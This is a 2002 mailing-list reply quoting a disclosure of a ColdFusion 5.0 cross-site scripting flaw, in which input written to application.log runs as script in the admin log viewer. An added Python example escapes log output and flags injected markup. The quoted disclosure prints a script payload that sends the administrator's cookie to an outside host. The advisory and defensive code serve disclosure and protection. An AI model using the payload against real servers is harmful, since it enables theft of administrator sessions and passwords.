The 'view admin log' feature in CF tends to cause stress on the CF
process, and also blocks the log file during opening.
So it's generally better (and safer, with this cross-site scripting
problem that's been around for years) to view the log file via a text
viewer on the system.
By default, it's c:\cfusion\log\*.log
On Mon, 16 Dec 2002, KiLL CoLe wrote:
> Cross-site scripting vulnerability in CF 5.0. This
> issue was brought up to Macromedia on July 22nd, 2002.
> Macromedia issued a fix to me, but I have not seen the
> fix available to the public. The ColdFusion
> administrator allows you to view your application log
> via your web browser. Under certain conditions, it is
> possible to remotely alter ColdFusion's application
> log. Take the following code:
>
> <CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
> SELECT * FROM Products
> Where ProductId = #int(url.productid)#
> </CFQUERY>
>
> If the INT function encounters a value that is not
> numeric, it throws an exception and writes the value
> that was passed to application.log. Should an
> unsuspecting administrator view the log file via their
> web browser, script could be executed. Analyze this
> code:
> If url.productid (from the above example) were passed
> in as:
>
> <iframe name="frame1" width="0" height="0"></iframe>
> <script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie="
> + document.cookie</script>
>
> This would enable an attacker to steal the value of
> the ColdFusion administrator's cookie. Decrypting the
> ColdFusion admin's password is well documented, and
> exposes a mild-moderate threat to server security.
>
> **NOTE: there are dozens of other functions that throw
> exceptions similar to the INT function.
>
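As an added example (not from the thread or from Macromedia), the defender's side of the mechanism described above: an exception message that echoes a non-numeric parameter into application.log, a log viewer that HTML-escapes each field before rendering next to one that echoes the text raw, and a scan over the log file for markup that reached it. The log column layout and the error text are constructed assumptions for this example, not the real CF 5 file format.

```python
import html
import re

# Constructed sample of a ColdFusion-style application log. The column layout
# ("Severity","ThreadID","Date","Time","Application","Message") is an
# assumption for this example, not the exact CF 5 format.
SAMPLE_LOG = [
    '"Information","web-1","12/16/02","10:01:13","","Application started"',
    '"Error","web-2","12/16/02","10:02:45","","Invalid parameter type. '
    'The value \'<script>alert(1)</script>\' cannot be converted to a number."',
    '"Error","web-3","12/16/02","10:03:02","","Invalid parameter type. '
    'The value \'abc\' cannot be converted to a number."',
]

# Any HTML-looking tag inside a log field: untrusted input reached the log.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")


def parse_line(line):
    """Split one double-quoted, comma-separated log line into its fields."""
    fields = re.findall(r'"((?:[^"]|"")*)"', line)
    return [f.replace('""', '"') for f in fields]


def render_log_html(lines, escape=True):
    """Render log lines as HTML table rows.

    escape=True is the safe viewer: every field is HTML-escaped, so logged
    markup is shown as text. escape=False reproduces the unsafe behaviour of
    echoing log text straight into the admin page, which is what lets a
    logged <script> run in the administrator's browser.
    """
    rows = []
    for line in lines:
        cells = parse_line(line)
        if escape:
            cells = [html.escape(c, quote=True) for c in cells]
        rows.append("<tr>" + "".join(f"<td>{c}</td>" for c in cells) + "</tr>")
    return "<table>" + "".join(rows) + "</table>"


def find_markup_in_log(lines):
    """Return (line number, message) pairs whose message field contains
    HTML tags, i.e. entries worth reviewing as attempted log injection."""
    hits = []
    for n, line in enumerate(lines, 1):
        cells = parse_line(line)
        if cells and TAG_RE.search(cells[-1]):
            hits.append((n, cells[-1]))
    return hits
```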